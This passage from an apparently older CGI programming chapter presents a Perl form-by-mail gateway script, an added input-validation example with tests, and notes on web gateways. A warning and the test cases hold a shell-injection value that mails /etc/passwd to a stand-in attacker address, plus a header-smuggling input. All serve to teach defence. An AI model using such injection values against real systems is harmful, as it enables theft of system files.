<TT><FONT FACE="Courier">if ($email =~ /[^a-zA-Z0-9_\-\.@]/) {
<BR>
</FONT></TT>
</BLOCKQUOTE>
<P>
<CENTER><TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>
<TR><TD><B>Warning</B></TD></TR>
<TR><TD>
<BLOCKQUOTE>
Be very careful when you create a script that passes arguments to other programs or issues shell commands! If the input were not verified for illegal e-mail addresses, a cracker could easily exploit this hole. A cracker could, for example, send the file containing the list of users' passwords on the server to his or her own mailbox by entering the e-mail address <TT><FONT FACE="Courier">something ; mail bad@address.com &lt; /etc/passwd</FONT></TT>! Or, even worse, the cracker could delete files belonging to the user that runs the Web server by using the <TT><FONT FACE="Courier">rm</FONT></TT> (remove file) command instead of the <TT><FONT FACE="Courier">mail</FONT></TT> command! The golden rule is: Always verify the user's input and allow only what is strictly necessary.
</BLOCKQUOTE>

</TD></TR>
</TABLE></CENTER>
<P>
<H3><A NAME="FormbyMail">Form-by-Mail</A></H3>
<P>
The gateway presented in Listing 7.4 acts as an intermediary between
the Web server and a mail program. It is useful for sending form
results by e-mail. One of the uses for this, for example, is a
comments page in which users visiting your Web pages can leave
their comments or questions.
<P>
This script should be called from the form page with the <TT><FONT FACE="Courier">POST</FONT></TT>
method:
<BLOCKQUOTE>
<TT><FONT FACE="Courier">&lt;FORM ACTION=&quot;/cgi-bin/mailform?user@server?subject&quot;
METHOD=post&gt;</FONT></TT>
</BLOCKQUOTE>
<P>
The e-mail address the form should be sent to is specified
in <TT><FONT FACE="Courier">user@server</FONT></TT>, and the subject
follows it. The two arguments are separated by a <TT><FONT FACE="Courier">?</FONT></TT>
sign. If the form has a field called <TT><FONT FACE="Courier">email</FONT></TT>,
the script will send the form results with the <TT><FONT FACE="Courier">From:</FONT></TT>
and <TT><FONT FACE="Courier">Reply-To:</FONT></TT> lines containing
the correct e-mail address, so you can use the reply function
of your mail reader program to answer the user's questions. If
there is no field called <TT><FONT FACE="Courier">email</FONT></TT>
on the form, the script will send the mail as if it came from
the user who runs the Web server (usually <TT><FONT FACE="Courier">nobody</FONT></TT>
or <TT><FONT FACE="Courier">webmaster</FONT></TT>). See Figure
7.5 for an example of an HTML form that uses the mailform script.
<P>
<A HREF="f7-5.gif" ><B>Figure 7.5:</B> <I>The HTML source of a form page.</I></A>
<HR>
<BLOCKQUOTE>
<B>Listing 7.4. A form-by-mail script called mailform.<BR>
</B>
</BLOCKQUOTE>
<BLOCKQUOTE>
<TT><FONT FACE="Courier">#!/usr/bin/perl<BR>
###########################################################################<BR>
# mailform.pl 1.0 - A simple form-by-mail script<BR>
#<BR>
# How does it work?<BR>
#<BR>
# It gets data from an HTML form and sends all the field values to the<BR>
# address specified as the first parameter of the script.<BR>
#<BR>
# Special field on form named &quot;email&quot; is used for the Reply-To header.<BR>
#<BR>
# Antonio Ferreira<BR>
# amcf@esoterica.pt<BR>
# March 1996<BR>
###########################################################################<BR>
<BR>
require '/usr/lib/cgi-lib.pl';&nbsp;&nbsp;&nbsp;&nbsp;# The useful cgi-lib<BR>
<BR>
######################### Variable initialization ########################<BR>
<BR>
##### Paths, binaries and system specific information #####<BR>
$url = 'http://www.esoterica.pt/cgi-bin/mailform.pl';&nbsp;&nbsp;&nbsp;&nbsp;# mailform URL<BR>
$sendmail = '/usr/bin/smail';&nbsp;&nbsp;&nbsp;&nbsp;# Path and parameters for the mailer<BR>
$mailserver = 'mail.esoterica.pt';&nbsp;&nbsp;&nbsp;&nbsp;# Complete mail server hostname<BR>
<BR>
########################## Start of Main Program ##########################<BR>
<BR>
&amp;ReadParse(*input);&nbsp;&nbsp;&nbsp;&nbsp;# cgi-lib, fills @input (raw key=value pairs) and %input (decoded values)<BR>
print &amp;PrintHeader();&nbsp;&nbsp;&nbsp;&nbsp;# cgi-lib, prints header &quot;Content-type: text/html\n\n&quot;<BR>
<BR>
# The script is called as mailform?user@server?subject; anything after a third '?' is ignored<BR>
($destaddr, $subject, $garbage) = split(/\?/, $ENV{'QUERY_STRING'});<BR>
<BR>
if (&amp;MethGet()) {<BR>
&nbsp;&nbsp;&nbsp;&nbsp;print &lt;&lt;EOM;<BR>
&lt;HTML&gt;<BR>
&lt;HEAD&gt;<BR>
&lt;TITLE&gt;Message not sent&lt;/TITLE&gt;<BR>
&lt;/HEAD&gt;<BR>
&lt;BODY&gt;<BR>
The message should be sent with the &lt;B&gt;POST&lt;/B&gt; method!<BR>
&lt;/BODY&gt;<BR>
&lt;/HTML&gt;<BR>
EOM<BR>
} else {<BR>
&nbsp;&nbsp;&nbsp;&nbsp;# $destaddr ends up on a shell command line in SendForm, so refuse it<BR>
&nbsp;&nbsp;&nbsp;&nbsp;# when it is empty or contains anything but e-mail address characters<BR>
&nbsp;&nbsp;&nbsp;&nbsp;if ($destaddr eq '' || $destaddr =~ /[^a-zA-Z0-9_\-\.@]/) {<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &lt;&lt;EOM;<BR>
&lt;HTML&gt;<BR>
&lt;HEAD&gt;<BR>
&lt;TITLE&gt;Message not sent&lt;/TITLE&gt;<BR>
&lt;/HEAD&gt;<BR>
&lt;BODY&gt;<BR>
The message did not have a valid destination address.<BR>
&lt;/BODY&gt;<BR>
&lt;/HTML&gt;<BR>
EOM<BR>
&nbsp;&nbsp;&nbsp;&nbsp;} else {<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&amp;SendForm();<BR>
&nbsp;&nbsp;&nbsp;&nbsp;}<BR>
}<BR>
<BR>
exit(0);<BR>
<BR>
########################## End of Main Program ##########################<BR>
<BR>
#################### Start of subroutines definitions ###################<BR>
<BR>
##### Uses the mailer defined to send the reply #####<BR>
sub SendForm {<BR>
&nbsp;&nbsp;&nbsp;&nbsp;$fromurl = $ENV{'HTTP_REFERER'};<BR>
&nbsp;&nbsp;&nbsp;&nbsp;$fromhost = $ENV{'REMOTE_HOST'};<BR>
&nbsp;&nbsp;&nbsp;&nbsp;$subject =~ s/%(..)/pack(&quot;c&quot;, hex($1))/ge;&nbsp;&nbsp;&nbsp;&nbsp;# URL-decode the subject from the query string<BR>
&nbsp;&nbsp;&nbsp;&nbsp;$subject =~ s/[\r\n]//g;&nbsp;&nbsp;&nbsp;&nbsp;# it becomes a mail header, so it must stay on one line<BR>
&nbsp;&nbsp;&nbsp;&nbsp;if ($subject eq '') {<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$subject = $fromurl;<BR>
&nbsp;&nbsp;&nbsp;&nbsp;}<BR>
&nbsp;&nbsp;&nbsp;&nbsp;# The email field goes into the From: and Reply-To: headers; use it only<BR>
&nbsp;&nbsp;&nbsp;&nbsp;# if it looks like a plain address (no spaces, quotes or line breaks)<BR>
&nbsp;&nbsp;&nbsp;&nbsp;if ($input{'email'} eq '' || $input{'email'} =~ /[^a-zA-Z0-9_\-\.@]/) {<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$fromaddr = 'www';<BR>
&nbsp;&nbsp;&nbsp;&nbsp;} else {<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$fromaddr = $input{'email'};<BR>
&nbsp;&nbsp;&nbsp;&nbsp;}<BR>
&nbsp;&nbsp;&nbsp;&nbsp;open(MAIL, &quot;| $sendmail \&quot;$destaddr\&quot;&quot;) || die &quot;Cannot run $sendmail: $!&quot;;<BR>
&nbsp;&nbsp;&nbsp;&nbsp;print MAIL &lt;&lt;EOM;<BR>
From: $fromaddr<BR>
To: $destaddr<BR>
Reply-To: $fromaddr<BR>
Subject: $subject<BR>
X-Mail-Program: Mailform<BR>
<BR>
URL: $fromurl<BR>
SERVIDOR: $fromhost<BR>
<BR>
EOM<BR>
&nbsp;&nbsp;&nbsp;&nbsp;foreach $field (@input) {<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$_ = $field;<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;($name) = /^([^=]+)=/;&nbsp;&nbsp;&nbsp;&nbsp;# field name: everything before the first '='<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$name =~ s/%(..)/pack(&quot;c&quot;, hex($1))/ge;&nbsp;&nbsp;&nbsp;&nbsp;# URL-decode it as cgi-lib did for %input<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print MAIL &quot;-=-=- $name -=-=-\n&quot;;<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print MAIL &quot;$input{$name}\n&quot;;<BR>
&nbsp;&nbsp;&nbsp;&nbsp;}<BR>
&nbsp;&nbsp;&nbsp;&nbsp;close(MAIL);<BR>
&nbsp;&nbsp;&nbsp;&nbsp;print &lt;&lt;EOM;<BR>
&lt;HTML&gt;<BR>
&lt;HEAD&gt;<BR>
&lt;TITLE&gt;Message sent&lt;/TITLE&gt;<BR>
&lt;/HEAD&gt;<BR>
&lt;BODY&gt;<BR>
&lt;H2 ALIGN=center&gt;Your message was sent to $destaddr!&lt;/H2&gt;<BR>
&lt;/BODY&gt;<BR>
&lt;/HTML&gt;<BR>
EOM<BR>
}</FONT></TT>
</BLOCKQUOTE>
<HR>
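The checks the warning above calls for, applied to the two user-supplied addresses that mailform.pl hands to the mailer, as an added example that is not part of the book's listing: valid_address, parse_query and open_mailer are names chosen here, the query strings are constructed, and open_mailer assumes Perl 5.8 or later for the list-form pipe open.

```perl
#!/usr/bin/perl
# Added example, not the book's code: reject a bad destination or reply
# address before the mailer sees it, and invoke the mailer without a shell.
use strict; use warnings;

# The chapter's whitelist: letters, digits, '_', '-', '.', '@'. A space, ';',
# '<', '"' or a line break fails it, so neither a shell command nor an extra
# mail header can ride along inside an address.
sub valid_address {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) && length($addr) <= 254;
    return 0 if $addr =~ /[^a-zA-Z0-9_\-\.@]/;
    return $addr =~ /^[^@]+@[^@]+\.[^@]+$/ ? 1 : 0;   # one '@', a dot in the domain
}

# "user@server?subject" parsed as mailform.pl does, but a bad destination
# yields an empty list instead of reaching the shell; CR/LF are stripped
# from the subject because it becomes a mail header line.
sub parse_query {
    my ($query) = @_;
    my ($dest, $subject) = split(/\?/, $query, 3);
    return unless valid_address($dest);
    $subject = '' unless defined $subject;
    $subject =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;   # URL-decode
    $subject =~ s/[\r\n]+//g;
    return ($dest, $subject);
}

# List-form pipe open (Perl 5.8+): $dest is one argv element of the mailer
# process, so no shell ever parses it. Returns the handle to write the mail to.
sub open_mailer {
    my ($sendmail, $dest) = @_;
    open(my $mail, '|-', $sendmail, $dest) or die "cannot run $sendmail: $!";
    return $mail;
}

# Constructed query strings; expected result is 1 (accepted) or 0 (rejected).
my @cases = (
    ['user@server.example?Comments%20page',               1],
    ['something ; mail bad@address.com < /etc/passwd?x',  0],  # the warning's case
    ["user\@server.example\nBcc:x\@y.z?hi",               0],  # header smuggled into the address
    ['user@server.example?Hi%0ABcc:x@y.z',                1],  # newline stripped from the subject
);
for my $c (@cases) {
    my ($dest, $subject) = parse_query($c->[0]);
    my $got  = defined $dest ? 1 : 0;
    my $mark = $got == $c->[1] ? 'ok ' : 'BAD';
    print "$mark expected=$c->[1] got=$got", defined $subject ? " subject=[$subject]" : '', "\n";
}
```

Run it with `perl mailform_checks.pl`; every line should start with `ok`, and the last one shows the subject with its injected line break removed.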
<P>
The HTML source presented in Figure 7.5 corresponds to the FORM
in Figure 7.6. This figure shows what the user sees in his or
her browser.
<P>
<A HREF="f7-6.gif" ><B>Figure 7.6:</B> <I>The form that will be sent by mail.</I></A>
<P>
When the user presses the Send It button, the form is sent
by mail and arrives in the destination mailbox. The received
mail message will be similar to the one presented in Figure 7.7.
<P>
<A HREF="f7-7.gif" ><B>Figure 7.7:</B> <I>The message that arrived in the mailbox.</I></A>
<P>
Lots of other examples could be given here, but we'll let you
explore further. There are many gateways out there waiting for
you to improve them: finger, wais, archie, uptime, passwd, mail,
news, and so on. Explore the programs or protocols first and then
modify the corresponding gateways to suit your needs.
<H2><A NAME="UsingtheWebasaStandardInternetAcc"><FONT SIZE=5 COLOR=#FF0000>Using
the Web as a Standard Internet Access Interface</FONT></A></H2>
<P>
When I first became familiar with the Web and then with CGI and
gateways, I started thinking to myself: &quot;Wow, the Web is
great, and I'll use it to do everything I have ever dreamed of
doing on the Internet!&quot; Yes and No. The Web is really great,
and it is actually the most suited platform to integrate most
of Internet services or functions. But there are some protocols
that simply cannot be integrated in Web pages through the use
of gateways or similar mechanisms due to their original design,
which is incompatible with the Web.
<P>
One such example is the telnet protocol. This protocol is highly
interactive and does not fit within the client/server connect-and-send-on-demand
architecture of the HTTP protocol and the Web. During a telnet
connection, the user screen and the telnet server must be connected
without interruption so the user can type characters on the keyboard
and immediately see results on the screen. How could that be done
in a Web page? We could imagine a Web page that would be reloaded
each time the user presses a key or each time there are results
coming from the telnet server, but that would be practically impossible
to accomplish due to performance considerations and design difficulties
on the server side. What is possible is the integration of a telnet
capable program within a Web browser so that we can telnet from
a Web page. But that would be more a telnet screen than a Web
page.
<P>
Another example is the Ping protocol. It is used to test whether
a machine is alive and well: the client sends packets, and the
server replies as soon as it receives them. Generally, Ping programs
keep sending and receiving packets until we stop them deliberately,
which is a problem because a result HTML page can be produced
only when the program's activity (in this case, Ping activity) finishes
without user intervention. So one must use a Ping program that
sends and receives a fixed number of packets and, as soon as it
finishes, returns the results to be displayed in an HTML page.
<P>
Fortunately, many other protocols can be integrated through the
use of a gateway. For example, there are mail and news gateways
that allow reading of mail and news, respectively, as well as
database gateways that allow querying from a Web page.
<P>
The World Wide Web is evolving as the most powerful, cross-platform,
independent, distributed, and hypermedia mechanism for information
retrieval. Gateways can only help the Web expand even more in
order to become <I>the</I> platform for Internet access. Stay
tuned!
<H2><A NAME="Summary"><FONT SIZE=5 COLOR=#FF0000>Summary</FONT></A>
</H2>
<P>
This chapter covered server-side includes and World-Wide Web gateways.
Both mechanisms help you extend your Web server functionality
and consequently improve the richness of the information you want
to show to other users. You have learned how to use both SSI and
gateways and how to develop custom solutions for your own use.
<P>
<HR WIDTH="100%"></P>


<P>
<HR WIDTH="100%"></P>

</BODY>
</HTML>
